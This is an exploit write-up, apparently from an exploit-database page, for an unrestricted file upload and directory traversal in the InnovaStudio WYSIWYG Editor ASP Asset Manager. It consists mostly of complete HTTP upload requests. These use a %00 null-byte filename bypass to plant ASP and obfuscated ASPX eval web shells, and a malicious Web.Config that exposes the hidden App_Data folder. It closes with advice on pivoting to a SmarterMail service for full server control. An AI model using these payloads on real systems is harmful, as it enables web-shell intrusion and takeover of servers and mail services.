扫码分享
验证:
体验盒子# Exploit Title: InnovaStudio WYSIWYG Editor 5.4 - Unrestricted File Upload / Directory Traversal
# Date: 11/04/2023
# Exploit Author: Zer0FauLT [admindeepsec@proton.me]
# Vendor Homepage: innovastudio.com
# Product: Asset Manager
# Version: <= Asset Manager ASP Version 5.4
# Tested on: Windows 10 and Windows Server 2019
# CVE : 0DAY
##################################################################################################
##
#ASP version, in i_upload_object_FSO.asp, line 234 #
##
#oUpload.AllowedTypes = "gif|jpg|png|wma|wmv|swf|doc|zip|pdf|txt"#
##
##################################################################################################
||==============================================================================||
||((((1)))) ||
||||
||...:::We Trying Upload ASP-ASPX-PHP-CER-OTHER SHELL FILE EXTENSIONS:::... ||
||==============================================================================||
##################################################################################################
""
" FILE PERMISSIONS : [ 0644 ]"
""
" DIR PERMISSIONS: [ 0755 ]"
""
"UPLOAD FOLDER: [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets ] "
""
##################################################################################################
==================================================================================================
POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2
Host: www.pentest.com
Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG
Content-Length: 473
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://www.pentest.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpCurrFolder2"
C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpFilter"
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="File1"; filename="shell.asp"
Content-Type: application/octet-stream
<%eval request("#11")%>
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS--
==================================================================================================
" ...[ RESPONCE ]... "
""
" ASP-ASPX-PHP-CER-OTHER FILE EXTENSIONS to types is not allowed."
""
==================================================================================================
***
||================================================================================||
||((((2)))) ||
||||
||...:::Now we will manipulate the filename: ===>>> filename="shell.asp":::...||
||||
||================================================================================||
##################################################################################################
""
" FILE PERMISSIONS : [ 0644 ]"
""
" DIR PERMISSIONS: [ 0755 ]"
""
"UPLOAD FOLDER: [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets ] "
""
##################################################################################################
==================================================================================================
POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2
Host: www.pentest.com
Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG
Content-Length: 473
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://www.pentest.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpCurrFolder2"
C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpFilter"
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="File1"; filename="shell.asp%00asp.txt"
Content-Type: application/octet-stream
<%eval request("#11")%>
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS--
==================================================================================================
">>> filename="shell.asp%00asp.txt" <<<"
""
" [ %00 ] ===> We select these values > Right Click > Convert Selecetion > URL > URL-decode"
""
"or"
""
" CTRL+Shift+U "
""
" SEND!"
""
==================================================================================================
" ...[ RESPONCE ]... "
""
" OK! "
""
"UPLOADED FOLDER: [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets\shell.asp ] "
""
" SHELL PATH: https://www.pentest.com/editor/assets/shell.asp/aspx/php/cer/[Unrestricted]"
""
==================================================================================================
***
||==============================================================================||
||((((3)))) ||
||||
||...:::NO WRITE PERMISSION!:::...||
||||
|| ...:::Directory Traversal:::...||
||||
||==============================================================================||
##################################################################################################
""
" FILE PERMISSIONS: [ 0600 ] "
""
" DEFAULT DIR[\Editor\assets] PERMISSIONS : [ 0700 ] "
""
" OTHER[App_Data] DIR PERMISSIONS : [ 0777 ] "
""
" DEFAULT FOLDER: [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets ] "
""
" App_Data FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data ]"
""
" TEST WORK DIR :https://www.pentest.com/App_Data <<<= [ 404 ERROR - N/A ] "
""
""
##################################################################################################
##########################################################################################################################################################
##
# What is the App_Data Folder useful?#
# App_Data contains application data files including .mdf database files, XML files, and other data store files. #
# The App_Data folder is used by ASP.NET to store an application's local database, such as the database for maintaining membership and role information. #
# The App_Data folder is not public like the other website directories under the Home Directory. #
# Because it's a private directory, the IIS server hides it for security reasons.#
# Now, we will test whether such a directory exists. #
# If the directory exists, we will make it public so that we can define the necessary server functions for running a shell within it.#
# For this we will try to load a special server configuration file. This is a Web.Config file. With this we'll ByPass the directory privacy. #
# So the directory will be public and it will be able to respond to external queries and run a shell.#
##
##########################################################################################################################################################
==================================================================================================
POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2
Host: www.pentest.com
Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG
Content-Length: 473
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://www.pentest.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpCurrFolder2"
C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpFilter"
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="File1"; filename="Web.Config%00net.txt"
Content-Type: application/octet-stream
<configuration>
<system.webServer>
<defaultDocument>
<files>
<add value="*.asp" />
<add value="*.aspx" />
<add value="*.php" />
</files>
</defaultDocument>
<security>
<requestFiltering>
<hiddenSegments>
<clear />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
</configuration>
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS--
==================================================================================================
" ...[ RESPONCE ]... "
""
" OK! "
""
"UPLOADED FOLDER: [ C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data\Web.Config ] "
""
"TEST WORK for App_Data DIR :https://www.pentest.com/App_Data <<<= [ 403 ERROR - OK. ] "
""
==================================================================================================
# Now we will upload your shell to the directory where we made ByPass. #
==================================================================================================
POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2
Host: www.pentest.com
Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG
Content-Length: 473
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://www.pentest.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpCurrFolder2"
C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpFilter"
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="File1"; filename="shell.aspx%00aspx.txt"
Content-Type: application/octet-stream
<%@PAGE LANGUAGE=JSCRIPT EnableTheming = "False" StylesheetTheme="" Theme="" %>
<%var PAY:String=
Request["\x61\x62\x63\x64"];eval
(PAY,"\x75\x6E\x73\x61"+
"\x66\x65");%>
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS--
======================================================================================================
" ...[ RESPONCE ]... "
""
" OK! "
""
"UPLOADED FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data\shell.aspx ]"
""
"TEST WORK for Shell :https://www.pentest.com/App_Data/shell.aspx <<<= [ OK. ] "
""
==========================================================================================================================================
""
" So what can we do if no directory on the site has write permission?"
" If not, we will test for vulnerabilities in the paths of other applications running on the server. "
" Sometimes this can be a mail service related vulnerability,"
" Sometimes also it can be a "Service Permissions" vulnerability."
" Sometimes also it can be a "Binary Permissions " vulnerability."
" Sometimes also it can be a "Weak Service Permissions" vulnerability. "
" Sometimes also it can be a "Unquoted Service Path" vulnerability."
" Our limits are as much as our imagination... "
"***0DAY***"
" Ok. Now we will strengthen our lesson by exemplifying a vulnerability in the SmarterMail service."
" We saw that the SmarterMail service was installed on our IIS server and we detected a critical security vulnerability in this service. "
" TEST WORK for SmarterMail Service: [ http://mail.pentest.com/interface/root#/login ] "
" Data directory for this SmarterMail: [ C:\Program Files (x86)\SmarterTools\SmarterMail\MRS\App_Data ]"
" As shown above, we can first navigate to the App_Data directory belonging to the SmarterMail service,"
" And then upload our shell file to the server by bypassing it."
" This way, we will have full control over both the server and the mail service. "
" Shell Path: [ http://mail.pentest.com/App_Data/shell.aspx ]"
""
==========================================================================================================================================
体验盒子
